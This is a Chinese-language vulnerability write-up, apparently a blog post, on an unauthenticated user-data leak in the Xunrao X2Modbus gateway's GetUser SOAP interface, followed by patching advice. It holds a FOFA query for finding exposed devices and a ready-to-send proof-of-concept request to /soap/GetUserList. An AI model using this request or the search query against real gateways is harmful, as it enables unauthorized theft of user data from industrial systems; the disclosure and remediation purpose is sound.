迅饶科技X2Modbus网关-GetUser信息泄露漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

该漏洞的存在是由于'GetUser'接口在处理SOAP请求时,缺乏对请求的充分验证和授权检查,任何人都可以通过发送特定的SOAP请求,获取系统中存在的用户信息,攻击者可以通过发送包含合法用户凭据的SOAP请求,绕过身份验证机制,直接获取用户数据。

漏洞再现

FOFA:server="SunFull-Webs"

http://ip:898/login.html页面抓包,在重放器使用下面的格式

POST /soap/GetUserList

HTTP/1.1 ip

Cookie: language=zh-cn; language=zh-cn; username=admin

Content-Length: 12

Connection: close

{"CmpWc":""}

修复建议

对 GetUser 接口的输入进行严格的验证和过滤。确保输入的用户名和密码符合预期的格式和长度,防止恶意用户通过构造特殊字符或语句来获取信息。

定期检查迅饶科技官方网站或相关渠道,获取 X2Modbus 网关的最新安全补丁,并及时应用到系统中。厂商通常会修复已知的漏洞,通过更新补丁可以有效地防止攻击者利用这些漏洞进行信息泄露攻击。

相关推荐
一只小bit32 分钟前
Linux网络:阿里云轻量级应用服务器配置防火墙模板开放端口
linux·网络·阿里云
帽儿山的枪手2 小时前
HVV期间,如何使用SSH隧道绕过内外网隔离限制?
linux·网络协议·安全
柏峰电子2 小时前
市政道路积水监测系统:守护城市雨天出行安全的 “智慧防线”
大数据·人工智能·安全
上海云盾商务经理杨杨2 小时前
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
安全·网络安全
BachelorSC2 小时前
【网络工程师软考版】网络安全
网络·安全·web安全
(Charon)4 小时前
【C语言网络编程】HTTP 客户端请求(基于 Socket 的完整实现)
网络·网络协议·http
Bryce李小白4 小时前
Kotlin实现Retrofit风格的网络请求封装
网络·kotlin·retrofit
Lovyk5 小时前
Linux网络管理
服务器·网络·php
MC皮蛋侠客6 小时前
AsyncIOScheduler 使用指南:高效异步任务调度解决方案
网络·python·fastapi
不灭锦鲤7 小时前
网络安全第15集
安全·web安全